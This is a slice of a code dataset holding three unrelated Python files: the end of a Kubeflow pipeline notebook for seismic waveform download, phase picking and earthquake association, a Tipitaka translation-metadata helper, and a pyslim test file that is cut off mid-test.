tmp_dict[\"elevation(m)\"] = chn.longitude, chn.latitude, chn.elevation\n tmp_dict[\"component\"], tmp_dict[\"response\"], tmp_dict[\"unit\"] = component, response, dtype\n station_locs[sid] = tmp_dict\n \n station_locs = pd.DataFrame.from_dict(station_locs, orient='index')\n station_locs.to_csv(station_csv,\n sep=\"\\t\", float_format=\"%.3f\",\n index_label=\"station\",\n columns=[\"longitude\", \"latitude\", \"elevation(m)\", \"unit\", \"component\", \"response\"])\n\n with open(station_pkl, \"wb\") as fp:\n pickle.dump(stations, fp)\n \n# ####### Plot stations ########\n plt.figure()\n plt.plot(station_locs[\"longitude\"], station_locs[\"latitude\"], \"^\", label=\"Stations\")\n plt.xlabel(\"X (km)\")\n plt.ylabel(\"Y (km)\")\n plt.axis(\"scaled\")\n plt.legend()\n plt.title(f\"Number of stations: {len(station_locs)}\")\n# plt.savefig(os.path.join(data_path, \"stations_loc.png\"))\n # plt.show()\n\n\n# In[24]:\n\n\ndownload_stations(root_dir(\"config.pkl\"), root_dir(\"stations.csv\"), root_dir(\"stations.pkl\"))\n\n\n# In[25]:\n\n\ndownload_stations_op = comp.func_to_container_op(download_stations, \n base_image='python:3.8',\n packages_to_install= [\n \"obspy\",\n \"pandas\",\n# \"matplotlib\"\n ])\n\n\n# In[26]:\n\n\ndef download_waveform(i: int, \n index_pkl: InputPath(\"pickle\"),\n config_pkl: InputPath(\"pickle\"),\n datetime_pkl: InputPath(\"pickle\"),\n station_pkl: InputPath(\"pickle\"),\n fname_csv: OutputPath(str),\n data_path:str = \"/tmp\"\n# bucket_name:str = \"waveforms\",\n# s3_url:str = \"localhost:9000\", \n# secure:bool = True\n ) -> str:\n \n import pickle, os\n import obspy\n from obspy.clients.fdsn import Client\n import time\n import threading\n lock = threading.Lock()\n \n# from minio import Minio\n# minioClient = Minio(s3_url,\n# access_key='minio',\n# secret_key='minio123',\n# secure=secure)\n \n# if not minioClient.bucket_exists(bucket_name):\n# minioClient.make_bucket(bucket_name)\n\n with open(index_pkl, \"rb\") as fp:\n index = pickle.load(fp)\n idx = index[i]\n with open(config_pkl, \"rb\") as fp:\n config = pickle.load(fp)\n with open(datetime_pkl, \"rb\") as fp:\n tmp = pickle.load(fp)\n starttimes = tmp[\"starttimes\"]\n interval = tmp[\"interval\"]\n with open(station_pkl, \"rb\") as fp:\n stations = pickle.load(fp)\n \n# waveform_dir = os.path.join(\"/tmp/\", bucket_name)\n waveform_dir = os.path.join(data_path, \"waveforms\")\n if not os.path.exists(waveform_dir):\n os.makedirs(waveform_dir)\n \n ####### Download data ########\n client = Client(config[\"client\"])\n fname_list = [\"fname\"]\n \n def download(i):\n# for i in idx: \n starttime = obspy.UTCDateTime(starttimes[i]) \n endtime = starttime + interval\n fname = \"{}.mseed\".format(starttime.datetime.strftime(\"%Y-%m-%dT%H:%M:%S\"))\n# if not overwrite:\n if os.path.exists(os.path.join(waveform_dir, fname)):\n print(f\"{fname} exists\")\n fname_list.append(fname)\n# continue\n return\n max_retry = 10\n stream = obspy.Stream()\n print(f\"{fname} download starts\")\n for network in stations:\n for station in network:\n print(f\"********{network.code}.{station.code}********\")\n retry = 0\n while retry < max_retry:\n try:\n tmp = client.get_waveforms(network.code, station.code, \"*\", config[\"channels\"], starttime, endtime)\n stream += tmp\n break\n except Exception as e:\n print(\"Error {}.{}: {}\".format(network.code, station.code,e))\n err = e\n retry += 1\n time.sleep(1)\n continue\n if retry == max_retry:\n print(f\"{fname}: MAX {max_retry} retries reached : {network.code}.{station.code} with error: {err}\")\n\n\n stream.write(os.path.join(waveform_dir, fname))\n print(f\"{fname} download succeeds\")\n# minioClient.fput_object(bucket_name, fname, os.path.join(waveform_dir, fname))\n lock.acquire()\n fname_list.append(fname)\n lock.release()\n \n threads = []\n for i in idx:\n t = threading.Thread(target=download, args=(i,))\n t.start()\n threads.append(t)\n for t in threads:\n t.join()\n \n with open(fname_csv, \"w\") as fp:\n fp.write(\"\\n\".join(fname_list))\n\n return waveform_dir\n\n\n# In[27]:\n\n\nwaveform_path = download_waveform(0, root_dir(\"index.pkl\"), root_dir(\"config.pkl\"), root_dir(\"datetimes.pkl\"), root_dir(\"stations.pkl\"), root_dir(\"fname.csv\"), data_path=root_dir(\"\"))\n\n\n# In[28]:\n\n\ndownload_waveform_op = comp.func_to_container_op(download_waveform, \n base_image='python:3.8',\n packages_to_install= [\n \"obspy\",\n# \"minio\"\n ])\n\n\n# In[29]:\n\n\ndef phasenet_op(data_path: str, \n data_list: str, \n stations: str):\n\n return dsl.ContainerOp(name='PhaseNet picking',\n image=\"zhuwq0/phasenet:latest\",\n command=['python'],\n arguments=[\n 'predict.py',\n '--model', \"model/190703-214543\",\n '--data_dir', data_path,\n '--data_list', dsl.InputArgumentPath(data_list),\n '--stations', dsl.InputArgumentPath(stations),\n# '--result_dir', \"results\",\n '--input_mseed',\n '--amplitude'\n ],\n file_outputs = {\"picks\": \"/opt/results/picks.json\"}\n )\n\n\n# In[46]:\n\n\ncommand = f\"python PhaseNet/phasenet/predict.py --model=PhaseNet/model/190703-214543 --data_list={root_dir('fname.csv')} --data_dir={root_dir('waveforms')} --stations={root_dir('stations.csv')} --result_dir={root_dir('phasenet')} --format=mseed_array --amplitude\"\nprint(command)\nos.system(f'{command}')\n\n\n# In[219]:\n\n\ndef gmma(i: int,\n index_pkl: InputPath(\"pickle\"),\n config_pkl: InputPath(\"pickle\"),\n pick_json: InputPath(\"json\"),\n station_csv: InputPath(str),\n catalog_csv: OutputPath(str),\n picks_csv: OutputPath(str),\n bucket_name:str = \"catalogs\",\n s3_url:str = \"localhost:9000\", \n secure:bool = True) -> str:\n \n import pandas as pd\n from datetime import datetime, timedelta\n from gmma import mixture\n import numpy as np\n from sklearn.cluster import DBSCAN \n from datetime import datetime, timedelta\n import os\n import json\n import pickle\n from tqdm import tqdm\n \n to_seconds = lambda t: t.timestamp(tz=\"UTC\")\n from_seconds = lambda t: pd.Timestamp.utcfromtimestamp(t).strftime(\"%Y-%m-%dT%H:%M:%S.%f\")[:-3]\n # to_seconds = lambda t: datetime.strptime(t, \"%Y-%m-%dT%H:%M:%S.%f\").timestamp()\n # from_seconds = lambda t: [datetime.utcfromtimestamp(x).strftime(\"%Y-%m-%dT%H:%M:%S.%f\")[:-3] for x in t]\n\n def convert_picks_csv(picks, stations, config):\n t = picks[\"timestamp\"].apply(lambda x: x.timestamp()).to_numpy()\n a = picks[\"amp\"].apply(lambda x: np.log10(x*1e2)).to_numpy()\n data = np.stack([t, a]).T\n meta = pd.merge(stations, picks[\"id\"], on=\"id\")\n locs = meta[config[\"dims\"]].to_numpy()\n phase_type = picks[\"type\"].apply(lambda x: x.lower()).to_numpy()\n phase_weight = picks[\"prob\"].to_numpy()[:,np.newaxis]\n return data, locs, phase_type, phase_weight\n\n def association(data, locs, phase_type, phase_weight, num_sta, pick_idx, event_idx0, config, pbar=None):\n\n db = DBSCAN(eps=config[\"dbscan_eps\"], min_samples=config[\"dbscan_min_samples\"]).fit(np.hstack([data[:,0:1], locs[:,:2]/6.0]))#.fit(data[:,0:1])\n labels = db.labels_\n unique_labels = set(labels)\n events = []\n preds = []\n probs = []\n \n assignment = []\n for k in unique_labels:\n if k == -1:\n continue\n \n class_mask = (labels == k)\n data_ = data[class_mask]\n locs_ = locs[class_mask]\n phase_type_ = phase_type[class_mask]\n phase_weight_ = phase_weight[class_mask]\n pick_idx_ = pick_idx[class_mask]\n \n if pbar is not None:\n pbar.set_description(f\"Process {len(data_)} picks\")\n\n num_event_ = min(max(int(len(data_)/min(num_sta,10)*config[\"oversample_factor\"]), 1), len(data_))\n t_range = max(data_[:,0].max() - data_[:,0].min(), 1)\n centers_init = np.vstack([np.ones(num_event_)*np.mean(stations[\"x(km)\"]),\n np.ones(num_event_)*np.mean(stations[\"y(km)\"]),\n np.zeros(num_event_),\n np.linspace(data_[:,0].min()-0.1*t_range, data_[:,0].max()+0.1*t_range, num_event_)]).T # n_eve, n_dim(x, y, z) + 1(t)\n\n if config[\"use_amplitude\"]:\n covariance_prior = np.array([[1,0],[0,1]]) * 3\n else:\n covariance_prior = np.array([[1]])\n data = data[:,0:1]\n \n gmm = mixture.BayesianGaussianMixture(n_components=num_event_, \n weight_concentration_prior=1000/num_event_,\n mean_precision_prior=0.3/t_range,\n covariance_prior=covariance_prior,\n init_params=\"centers\",\n centers_init=centers_init, \n station_locs=locs_, \n phase_type=phase_type_, \n phase_weight=phase_weight_,\n loss_type=\"l1\",\n bounds=config[\"bfgs_bounds\"],\n max_covar=10.0,\n reg_covar=0.1,\n ).fit(data_) \n\n pred = gmm.predict(data_) \n prob_matrix = gmm.predict_proba(data_)\n prob_eq = prob_matrix.mean(axis=0)\n# prob = prob_matrix[range(len(data_)), pred]\n# score = gmm.score(data_)\n# score_sample = gmm.score_samples(data_)\n prob = np.exp(gmm.score_samples(data_))\n\n idx = np.array([True if len(data_[pred==i, 0]) >= config[\"min_picks_per_eq\"] else False for i in range(len(prob_eq))]) #& (prob_eq > 1/num_event) #& (sigma_eq[:, 0,0] < 40)\n\n time = gmm.centers_[idx, len(config[\"dims\"])]\n loc = gmm.centers_[idx, :len(config[\"dims\"])]\n if config[\"use_amplitude\"]:\n mag = gmm.centers_[idx, len(config[\"dims\"])+1]\n sigma_eq = gmm.covariances_[idx,...]\n\n for i in range(len(time)):\n tmp = {\"time(s)\": time[i],\n \"magnitude\": mag[i],\n \"sigma\": sigma_eq[i].tolist()}\n for j, k in enumerate(config[\"dims\"]):\n tmp[k] = loc[i][j]\n events.append(tmp)\n \n for i in range(len(pick_idx_)):\n assignment.append((pick_idx_[i], pred[i]+event_idx0, prob[i]))\n \n event_idx0 += len(time)\n \n return events, assignment\n \n \n catalog_dir = os.path.join(\"/tmp/\", bucket_name)\n if not os.path.exists(catalog_dir):\n os.makedirs(catalog_dir)\n \n with open(index_pkl, \"rb\") as fp:\n index = pickle.load(fp)\n idx = index[i]\n\n with open(config_pkl, \"rb\") as fp:\n config = pickle.load(fp)\n \n ## read picks\n picks = pd.read_json(pick_json)\n picks[\"time_idx\"] = picks[\"timestamp\"].apply(lambda x: x.strftime(\"%Y-%m-%dT%H\")) ## process by hours\n\n ## read stations\n stations = pd.read_csv(station_csv, delimiter=\"\\t\")\n stations = stations.rename(columns={\"station\":\"id\"})\n stations[\"x(km)\"] = stations[\"longitude\"].apply(lambda x: (x - config[\"center\"][0])*config[\"degree2km\"])\n stations[\"y(km)\"] = stations[\"latitude\"].apply(lambda x: (x - config[\"center\"][1])*config[\"degree2km\"])\n stations[\"z(km)\"] = stations[\"elevation(m)\"].apply(lambda x: -x/1e3)\n\n ### setting GMMA configs\n config[\"dims\"] = ['x(km)', 'y(km)', 'z(km)']\n config[\"use_dbscan\"] = True\n config[\"use_amplitude\"] = True\n dx = (np.array(config[\"xlim_degree\"])-np.array(config[\"center\"][0]))*config[\"degree2km\"]\n dy = (np.array(config[\"ylim_degree\"])-np.array(config[\"center\"][1]))*config[\"degree2km\"]\n dz = 21\n # DBSCAN\n config[\"bfgs_bounds\"] = ((dx[0]-1, dx[1]+1), #x\n (dy[0]-1, dy[1]+1), #y\n (0, dz), #x\n (None, None)) #t\n config[\"dbscan_eps\"] = min(np.sqrt((stations[\"x(km)\"].max()-stations[\"x(km)\"].min())**2 +\n (stations[\"y(km)\"].max()-stations[\"y(km)\"].min())**2)/(6.0/1.75), 10)\n config[\"dbscan_min_samples\"] = min(len(stations), 5)\n # Filtering\n config[\"min_picks_per_eq\"] = min(len(stations)//2, 5)\n config[\"oversample_factor\"] = min(len(stations)//2, 5)\n print(\"Config: \", config)\n\n ## run GMMA association\n catalogs = []\n pbar = tqdm(sorted(list(set(picks[\"time_idx\"]))))\n event_idx0 = 0 ## current earthquake index\n assignments = []\n for i, hour in enumerate(pbar):\n picks_ = picks[picks[\"time_idx\"] == hour]\n data, locs, phase_type, phase_weight = convert_picks_csv(picks_, stations, config)\n catalog, assign = association(data, locs, phase_type, phase_weight, len(stations), picks_.index.to_numpy(), event_idx0, config, pbar)\n event_idx0 += len(catalog)\n catalogs.extend(catalog)\n assignments.extend(assign)\n \n ## create catalog\n catalogs = pd.DataFrame(catalogs, columns=[\"time(s)\"]+config[\"dims\"]+[\"magnitude\", \"sigma\"])\n catalogs[\"time\"] = catalogs[\"time(s)\"].apply(lambda x: from_seconds(x))\n catalogs[\"longitude\"] = catalogs[\"x(km)\"].apply(lambda x: x/config[\"degree2km\"] + config[\"center\"][0])\n catalogs[\"latitude\"] = catalogs[\"y(km)\"].apply(lambda x: x/config[\"degree2km\"] + config[\"center\"][1])\n catalogs[\"depth(m)\"] = catalogs[\"z(km)\"].apply(lambda x: x*1e3)\n catalogs[\"event_idx\"] = range(event_idx0)\n if config[\"use_amplitude\"]:\n catalogs[\"covariance\"] = catalogs[\"sigma\"].apply(lambda x: f\"{x[0][0]:.3f},{x[1][1]:.3f},{x[0][1]:.3f}\")\n else:\n catalogs[\"covariance\"] = catalogs[\"sigma\"].apply(lambda x: f\"{x[0][0]:.3f}\")\n with open(catalog_csv, 'w') as fp:\n catalogs.to_csv(fp, sep=\"\\t\", index=False, \n float_format=\"%.3f\",\n date_format='%Y-%m-%dT%H:%M:%S.%f',\n columns=[\"time\", \"magnitude\", \"longitude\", \"latitude\", \"depth(m)\", \"covariance\", \"event_idx\"])\n \n ## add assignment to picks\n assignments = pd.DataFrame(assignments, columns=[\"pick_idx\", \"event_idx\", \"prob_gmma\"])\n picks = picks.join(assignments.set_index(\"pick_idx\")).fillna(-1).astype({'event_idx': int})\n with open(picks_csv, 'w') as fp:\n picks.to_csv(fp, sep=\"\\t\", index=False, \n date_format='%Y-%m-%dT%H:%M:%S.%f',\n columns=[\"id\", \"timestamp\", \"type\", \"prob\", \"amp\", \"event_idx\", \"prob_gmma\"])\n \n ## upload to s3 bucket\n try:\n from minio import Minio\n minioClient = Minio(s3_url,\n access_key='minio',\n secret_key='minio123',\n secure=secure)\n if not minioClient.bucket_exists(bucket_name):\n minioClient.make_bucket(bucket_name)\n \n with open(os.path.join(catalog_dir, f\"catalog_{idx[0]:04d}.csv\"), 'w') as fp:\n catalogs.to_csv(fp, sep=\"\\t\", index=False, \n float_format=\"%.3f\",\n date_format='%Y-%m-%dT%H:%M:%S.%f',\n columns=[\"time\", \"magnitude\", \"longitude\", \"latitude\", \"depth(m)\"])\n minioClient.fput_object(bucket_name, f\"catalog_{i:04d}.csv\", os.path.join(catalog_dir, f\"catalog_{i:04d}.csv\"))\n except Exception as e:\n print(\"ERROR: can not access minio service!\")\n \n return f\"catalog_{i:04d}.csv\"\n \n\n\n# In[220]:\n\n\ncatalog = gmma(0, root_dir(\"index.pkl\"), root_dir(\"config.pkl\"), root_dir(\"phasenet/picks.json\"), root_dir(\"stations.csv\"), root_dir(\"catalog.csv\"), root_dir(\"picks.csv\"))\n# bucket_name=\"catalogs\", s3_url=\"localhost:9000\", secure=False)\n\n\n# In[53]:\n\n\ngmma_op = comp.func_to_container_op(gmma, \n base_image='python:3.8',\n packages_to_install= [\n \"pandas\",\n \"numpy\",\n \"scikit-learn\",\n \"minio\",\n \"gmma\"\n ])\n\n\n# In[54]:\n\n\ndef combine_catalog(catalog_csv: OutputPath(str),\n bucket_name:str = \"catalogs\",\n s3_url:str = \"minio-service:9000\", \n secure:bool = True):\n \n import pandas as pd\n from glob import glob\n import os\n \n from minio import Minio\n minioClient = Minio(s3_url,\n access_key='minio',\n secret_key='minio123',\n secure=secure)\n objects = minioClient.list_objects(bucket_name, recursive=True)\n \n tmp_path = lambda x: os.path.join(\"/tmp/\", x)\n for obj in objects:\n minioClient.fget_object(bucket_name, obj._object_name, tmp_path(obj._object_name))\n \n files_catalog = sorted(glob(tmp_path(\"catalog_*.csv\")))\n\n if len(files_catalog) > 0:\n combined_catalog = pd.concat([pd.read_csv(f, sep=\"\\t\", dtype=str) for f in files_catalog]).sort_values(by=\"time\")\n combined_catalog.to_csv(tmp_path(\"combined_catalog.csv\"), sep=\"\\t\", index=False)\n minioClient.fput_object(bucket_name, f\"combined_catalog.csv\", tmp_path(\"combined_catalog.csv\"))\n with open(catalog_csv, \"w\") as fout:\n with open(tmp_path(\"combined_catalog.csv\"), \"r\") as fin:\n for line in fin:\n fout.write(line)\n else:\n with open(catalog_csv, \"w\") as fout:\n pass\n print(\"No events.csv found!\")\n\n\n# In[55]:\n\n\n# combine_catalog(\"catalog.csv\", bucket_name=\"catalogs\", s3_url=\"localhost:9000\", secure=True)\n\n\n# In[56]:\n\n\ncombine_op = comp.func_to_container_op(combine_catalog, \n base_image='python:3.8',\n packages_to_install= [\n \"pandas\",\n \"minio\"\n ])\n\n\n# In[57]:\n\n\n# Define the pipeline\n@dsl.pipeline(name='QuakeFlow', description='')\ndef quakeflow_pipeline(data_path:str = \"/tmp/\", \n bucket_catalog:str = \"catalogs\",\n s3_url:str=\"minio-service:9000\", \n secure:bool=False):\n \n \n config = config_op()\n\n events = download_events_op(config.outputs[\"config_pkl\"])\n \n stations = download_stations_op(config.outputs[\"config_pkl\"])\n\n with kfp.dsl.ParallelFor(config.outputs[\"output\"]) as i:\n \n vop_ = dsl.VolumeOp(name=\"Create volume\",\n resource_name=\"data_volume\", \n size=\"10Gi\", \n modes=dsl.VOLUME_MODE_RWO)\n \n download_op_ = download_waveform_op(i, \n config.outputs[\"index_pkl\"], \n config.outputs[\"config_pkl\"], \n config.outputs[\"datetime_pkl\"], \n stations.outputs[\"station_pkl\"],\n data_path = data_path\n ).add_pvolumes({data_path: vop_.volume})\n\n phasenet_op_ = phasenet_op(download_op_.outputs[\"Output\"], \n download_op_.outputs[\"fname_csv\"], \n stations.outputs[\"station_csv\"]\n ).add_pvolumes({data_path: download_op_.pvolume})\n# phasenet_op_.execution_options.caching_strategy.max_cache_staleness = \"P0D\"\n\n gmma_op_ = gmma_op(i,\n config.outputs[\"index_pkl\"],\n config.outputs[\"config_pkl\"],\n phasenet_op_.outputs[\"picks\"],\n stations.outputs[\"station_csv\"],\n bucket_name = \"catalogs\",\n s3_url = s3_url,\n secure = secure\n ).add_pvolumes({data_path: phasenet_op_.pvolume})\n\n combine_op_ = combine_op(bucket_name = \"catalogs\", s3_url=s3_url, secure=secure).after(gmma_op_)\n combine_op_.execution_options.caching_strategy.max_cache_staleness = \"P0D\"\n\n\n# In[58]:\n\n\n# client = kfp.Client(host='553ab00ece5a86e5-dot-us-west1.pipelines.googleusercontent.com')\n\n\n# In[71]:\n\n\nexperiment_name = 'QuakeFlow'\npipeline_func = quakeflow_pipeline\nrun_name = pipeline_func.__name__ + '_run'\n\narguments = {\"data_path\": \"/tmp/\",\n \"bucket_catalog\": \"catalogs\",\n \"s3_url\": \"minio-service:9000\",\n \"secure\": False\n }\n\n# kfp.compiler.Compiler().compile(pipeline_func, '{}.zip'.format(experiment_name))\n# results = client.create_run_from_pipeline_func(pipeline_func, \n# experiment_name=experiment_name, \n# run_name=run_name, \n# arguments=arguments)\n\n","sub_path":"notebooks/Quakeflow_Pipeline.py","file_name":"Quakeflow_Pipeline.py","file_ext":"py","file_size_in_byte":32137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"145428597","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport os\nimport json\nimport collections\n# from pathInfo import xmlFilename2Info (cannot use because of circular import)\nimport pathInfo\n\n# See setTranslationData.py\nwith open(os.path.join(os.path.dirname(__file__), 'json/translationInfo.json'), 'r') as f:\n d = json.JSONDecoder(object_pairs_hook = collections.OrderedDict)\n translationInfo = d.decode(f.read())\n\n\ndef isValidTranslation(xmlFilename, translationLocale, translator):\n if translationLocale in translationInfo:\n if xmlFilename in translationInfo[translationLocale]['canon']:\n for localeXmlTranslation in translationInfo[translationLocale]['canon'][xmlFilename]:\n if translationInfo[translationLocale]['source'][ localeXmlTranslation['source'] ][0] == translator.decode('utf-8'):\n return True\n\n return False\n\n\ndef getTranslatorSource(xmlFilename, translationLocale, translator):\n if xmlFilename in translationInfo[translationLocale]['canon']:\n for localeXmlTranslation in translationInfo[translationLocale]['canon'][xmlFilename]:\n if translationInfo[translationLocale]['source'][ localeXmlTranslation['source'] ][0] == translator.decode('utf-8'):\n return localeXmlTranslation['source']\n\n raise Exception('cannot find translator source %s %s %s' % (xmlFilename, translationLocale, translator))\n\n\ndef getTranslator(translationLocale, localeXmlTranslation):\n return translationInfo[translationLocale]['source'][ localeXmlTranslation['source'] ][0]\n\n\ndef getLocaleXmlTranslations(translationLocale, xmlFilename):\n localeXmlTranslations = []\n for localeXmlTranslation in translationInfo[translationLocale]['canon'][xmlFilename]:\n tmp = { 'source': localeXmlTranslation['source'],\n 'translator': getTranslator(translationLocale, localeXmlTranslation) }\n\n # retrieve additional information if available\n if 'excerpt' in localeXmlTranslation:\n tmp['excerpt'] = localeXmlTranslation['excerpt']\n if 'URL' in localeXmlTranslation:\n tmp['URL'] = localeXmlTranslation['URL']\n if 'copyrightURL' in localeXmlTranslation:\n tmp['copyrightURL'] = localeXmlTranslation['copyrightURL']\n\n localeXmlTranslations.append(tmp)\n\n return localeXmlTranslations\n\n\ndef getI18nLinksTemplateValues(xmlFilename):\n i18nLinksTmpValue = { 'localeTranslations': [] }\n for translationLocale in translationInfo:\n localeTranslation = { 'translationLocale': translationLocale }\n if xmlFilename in translationInfo[translationLocale]['canon']:\n localeTranslation['localeXmlTranslations'] = \\\n getLocaleXmlTranslations(translationLocale, xmlFilename)\n\n if 'localeXmlTranslations' in localeTranslation:\n i18nLinksTmpValue['localeTranslations'].append(localeTranslation)\n\n if len(i18nLinksTmpValue['localeTranslations']) > 0:\n i18nLinksTmpValue['xmlFilename'] = xmlFilename\n return i18nLinksTmpValue\n\n\ndef getAllLocalesTranslationsTemplateValues():\n localeTranslations = []\n for translationLocale in translationInfo:\n localeTranslation = { 'translationLocale': translationLocale }\n localeTranslation['translations'] = []\n for xmlFilename in translationInfo[translationLocale]['canon']:\n info = pathInfo.xmlFilename2Info(xmlFilename)\n translation = { 'xmlFilename': xmlFilename,\n 'path': info['path'],\n 'translatedCanonNames': info['translatedCanonNames'],\n 'canonNames': info['canonNames'] }\n translation['localeXmlTranslations'] = \\\n getLocaleXmlTranslations(translationLocale, xmlFilename)\n localeTranslation['translations'].append(translation)\n\n if len(localeTranslation['translations']) > 0:\n localeTranslations.append(localeTranslation)\n\n return localeTranslations\n\n\ndef getXmlLocaleTranslationInfo(action, translationLocale, translator):\n trInfo = { 'isExcerpt': None,\n 'translationURL': None,\n 'translationCopyrightURL': None }\n\n xmlFilename = os.path.basename(action)\n localeXmlTranslations = translationInfo[translationLocale]['canon'][xmlFilename]\n for localeXmlTranslation in localeXmlTranslations:\n if translator.decode('utf-8') == translationInfo[translationLocale]['source'][ localeXmlTranslation['source'] ][0]:\n if 'excerpt' in localeXmlTranslation:\n trInfo['isExcerpt'] = True\n if 'copyrightURL' in localeXmlTranslation:\n trInfo['translationCopyrightURL'] = localeXmlTranslation['copyrightURL']\n if 'URL' in localeXmlTranslation:\n trInfo['translationURL'] = localeXmlTranslation['URL']\n\n return trInfo\n","sub_path":"tipitaka/pylib/translationInfo.py","file_name":"translationInfo.py","file_ext":"py","file_size_in_byte":4587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"341306123","text":"\"\"\"\nTest cases for the metadata reading/writing of pyslim.\n\"\"\"\nimport random\nimport json\n\nimport msprime\nimport tskit\nimport pytest\nimport numpy as np\n\nimport pyslim\nimport tests\nfrom .recipe_specs import restarted_recipe_eq\n\nclass TestAnnotate(tests.PyslimTestCase):\n '''\n Tests for tools to annotate existing msprime-derived tree sequences.\n '''\n\n def verify_annotated_tables(self, ts1, ts2):\n '''\n Verify that the tables returned after annotation are equal, up to the\n expected forgetting of metadata.\n '''\n tables1 = ts1.dump_tables()\n tables2 = ts2.dump_tables()\n # compare nodes\n assert np.array_equal(tables1.nodes.flags, tables2.nodes.flags)\n assert np.array_equal(tables1.nodes.time, tables2.nodes.time)\n assert np.array_equal(tables1.nodes.population, tables2.nodes.population)\n # compare edges\n assert tables1.edges == tables2.edges\n # compare sites\n assert np.array_equal(tables1.sites.position, tables2.sites.position)\n assert np.array_equal(tables1.sites.ancestral_state, tables2.sites.ancestral_state)\n assert np.array_equal(tables1.sites.ancestral_state_offset,\n tables2.sites.ancestral_state_offset)\n # compare mutations\n assert np.array_equal(tables1.mutations.site, tables2.mutations.site)\n assert np.array_equal(tables1.mutations.node, tables2.mutations.node)\n assert np.array_equal(tables1.mutations.derived_state, tables2.mutations.derived_state)\n assert np.array_equal(tables1.mutations.derived_state_offset,\n tables2.mutations.derived_state_offset)\n\n def verify_annotated_trees(self, ts1, ts2):\n '''\n Verify the *trees* returned before and after annotation are equal.\n '''\n assert ts1.num_trees == ts2.num_trees\n for t1, t2 in zip(ts1.trees(), ts2.trees()):\n assert t1.length == t2.length\n assert t1.get_parent_dict() == t2.get_parent_dict()\n assert t1.total_branch_length == t2.total_branch_length\n\n def verify_defaults(self, ts):\n '''\n Verify the default values have been entered into metadata.\n '''\n for m in ts.mutations():\n md = m.metadata\n assert md[\"mutation_type\"] == 1\n assert md[\"selection_coeff\"] == 0.0\n assert md[\"population\"] == tskit.NULL\n assert md[\"slim_time\"] == 0\n for n in ts.nodes():\n md = n.metadata\n if not n.is_sample():\n assert md is None\n else:\n assert md[\"is_null\"] is False\n assert md[\"genome_type\"] == pyslim.GENOME_TYPE_AUTOSOME\n for ind in ts.individuals():\n md = ind.metadata\n assert np.array_equal(ind.location, [0, 0, 0])\n assert ind.flags == pyslim.INDIVIDUAL_ALIVE\n assert md[\"sex\"] == pyslim.INDIVIDUAL_TYPE_HERMAPHRODITE\n assert md[\"flags\"] == 0\n for pop in ts.populations():\n md = pop.metadata\n assert md[\"selfing_fraction\"] == 0.0\n assert md[\"female_cloning_fraction\"] == 0.0\n assert md[\"male_cloning_fraction\"] == 0.0\n assert md[\"sex_ratio\"] == 0.0\n assert md[\"bounds_x0\"] == 0.0\n assert md[\"bounds_x1\"] == 0.0\n assert md[\"bounds_y0\"] == 0.0\n assert md[\"bounds_y1\"] == 0.0\n assert md[\"bounds_z0\"] == 0.0\n assert md[\"bounds_z1\"] == 0.0\n assert len(md[\"migration_records\"]) == 0\n\n def verify_provenance(self, ts):\n for u in ts.provenances():\n tskit.validate_provenance(json.loads(u.record))\n\n def verify_slim_restart_equality(self, in_ts, out_ts):\n \"\"\"\n Check for equality, in everything but the last provenance.\n \"\"\"\n assert in_ts.num_provenances + 1 == out_ts.num_provenances\n in_tables = in_ts.dump_tables()\n in_tables.sort()\n out_tables = out_ts.dump_tables()\n out_tables.sort()\n self.assertTableCollectionsEqual(in_tables, out_tables, skip_provenance=-1)\n\n def test_annotate_errors(self, helper_functions):\n for ts in helper_functions.get_msprime_examples():\n with pytest.raises(ValueError):\n _ = pyslim.annotate_defaults(ts, model_type=\"WF\",\n slim_generation=0)\n with pytest.raises(ValueError):\n _ = pyslim.annotate_defaults(ts, model_type=\"WF\",\n slim_generation=4.4)\n with pytest.raises(ValueError):\n _ = pyslim.annotate_defaults(ts, model_type=\"foo\",\n slim_generation=4)\n with pytest.raises(ValueError):\n _ = pyslim.annotate_defaults(ts, model_type=[],\n slim_generation=4)\n # odd number of samples\n ts = msprime.simulate(3)\n with pytest.raises(ValueError) as except_info:\n _ = pyslim.annotate_defaults(ts, model_type=\"WF\",\n slim_generation=1)\n assert \"diploid\" in str(except_info)\n # inconsistent populations for diploids\n ts = msprime.simulate(\n population_configurations=[\n msprime.PopulationConfiguration(sample_size=3),\n msprime.PopulationConfiguration(sample_size=1)],\n migration_matrix=[[0.0, 1.0], [1.0, 0.0]]\n )\n with pytest.raises(ValueError) as except_info:\n _ = pyslim.annotate_defaults(ts, model_type=\"WF\",\n slim_generation=1)\n assert \"more than one population\" in str(except_info)\n # inconsistent times for diploids\n samples = [\n msprime.Sample(population=0, time=0),\n msprime.Sample(population=0, time=0),\n msprime.Sample(population=0, time=0),\n msprime.Sample(population=0, time=1),\n ]\n ts = msprime.simulate(samples=samples)\n with pytest.raises(ValueError) as except_info:\n _ = pyslim.annotate_defaults(ts, model_type=\"WF\",\n slim_generation=1)\n assert \"more than one time\" in str(except_info)\n\n def test_basic_annotation(self, helper_functions, tmp_path):\n for ts in helper_functions.get_msprime_examples():\n slim_gen = 4\n slim_ts = pyslim.annotate_defaults(ts, model_type=\"WF\",\n slim_generation=slim_gen)\n assert slim_ts.metadata['SLiM']['model_type'] == 'WF'\n assert slim_ts.metadata['SLiM']['generation'] == slim_gen\n assert slim_ts.metadata['SLiM']['file_version'] == pyslim.slim_file_version\n self.verify_annotated_tables(ts, slim_ts)\n self.verify_annotated_trees(ts, slim_ts)\n self.verify_haplotype_equality(ts, slim_ts)\n self.verify_defaults(slim_ts)\n self.verify_provenance(slim_ts)\n # try loading this into SLiM\n loaded_ts = helper_functions.run_msprime_restart(slim_ts, tmp_path, WF=True)\n self.verify_annotated_tables(loaded_ts, slim_ts)\n self.verify_annotated_trees(loaded_ts, slim_ts)\n self.verify_haplotype_equality(loaded_ts, slim_ts)\n\n def test_annotate_individuals(self, helper_functions, tmp_path):\n for ts in helper_functions.get_msprime_examples():\n slim_ts = pyslim.annotate_defaults(ts, model_type=\"nonWF\", slim_generation=1)\n tables = slim_ts.dump_tables()\n top_md = tables.metadata\n top_md['SLiM']['separate_sexes'] = True\n tables.metadata = top_md\n metadata = [ind.metadata for ind in tables.individuals]\n sexes = [random.choice([pyslim.INDIVIDUAL_TYPE_FEMALE, pyslim.INDIVIDUAL_TYPE_MALE])\n for _ in metadata]\n for j in range(len(metadata)):\n 